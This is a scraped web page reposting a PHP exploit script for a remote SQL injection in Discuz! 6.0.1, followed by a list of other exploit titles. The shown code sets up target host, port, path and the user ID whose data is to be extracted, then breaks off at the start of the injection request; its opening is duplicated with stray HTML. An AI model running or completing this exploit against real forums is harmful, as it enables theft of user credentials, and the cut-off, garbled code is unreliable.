Discuz! 6.0.1 (searchid) Remote SQL Injection Exploit

日期:2013/11/22 18:52:00 来源:本网整理 阅读:23
点评:<?php error_reporting(E_ALL&E_NOTICE); print_r(" ------------------------------------------------------------------ Exploit discuz6.0.1 Just work as php>=5 & mysql>=4.1 BY james ---------------------------------------- < id="con_ad1"> < id="con_ad8"> <?php
error_reporting(E_ALL&E_NOTICE);
print_r("
------------------------------------------------------------------
Exploit discuz6.0.1
Just work as php>=5 & mysql>=4.1
BY james
------------------------------------------------------------------
");

if($argc>4)
{
$host=$argv[1];
$port=$argv[2];
$path=$argv[3];
$uid=$argv[4];
}else{
echo "Usage: php ".$argv[0]." host port path uid\n";
echo "host: target server \n";
echo "port: the web port, usually 80\n";
echo "path: path to discuz\n";
echo "uid : user ID you wanna get\n";
echo "Example:\r\n";
echo "php ".$argv[0]." localhost 80 1\n";
exit;
}

$content ="action=search&searchid=22

  • 本文相关:
  • LoveCMS 1.6.2 Final Update Settings Remote Exploit
  • TGS CMS 0.3.2r2 Remote Code Execution Exploit
  • BIND 9.x Remote DNS Cache Poisoning Flaw Exploit (spoof on ircd)
  • LoveCMS 1.6.2 Final Remote Code Execution Exploit
  • Xerox Phaser 8400 (reboot) Remote Denial of Service Exploit
  • moziloCMS 1.10.1 (download.php) Arbitrary Download File Exploit
  • Joomla Component EZ Store Remote Blind SQL Injection Exploit
  • Friendly Technologies (fwRemoteCfg.dll) ActiveX Command Exec Exploit
  • Friendly Technologies (fwRemoteCfg.dll) ActiveX Remote BOF Exploit
  • IntelliTamper 2.07 (imgsrc) Remote Buffer Overflow Exploit
  • 免责声明 - 关于我们 - 联系我们 - 广告联系 - 友情链接 - 帮助中心 - 频道导航
    Copyright © 2015 www.zgxue.com All Rights Reserved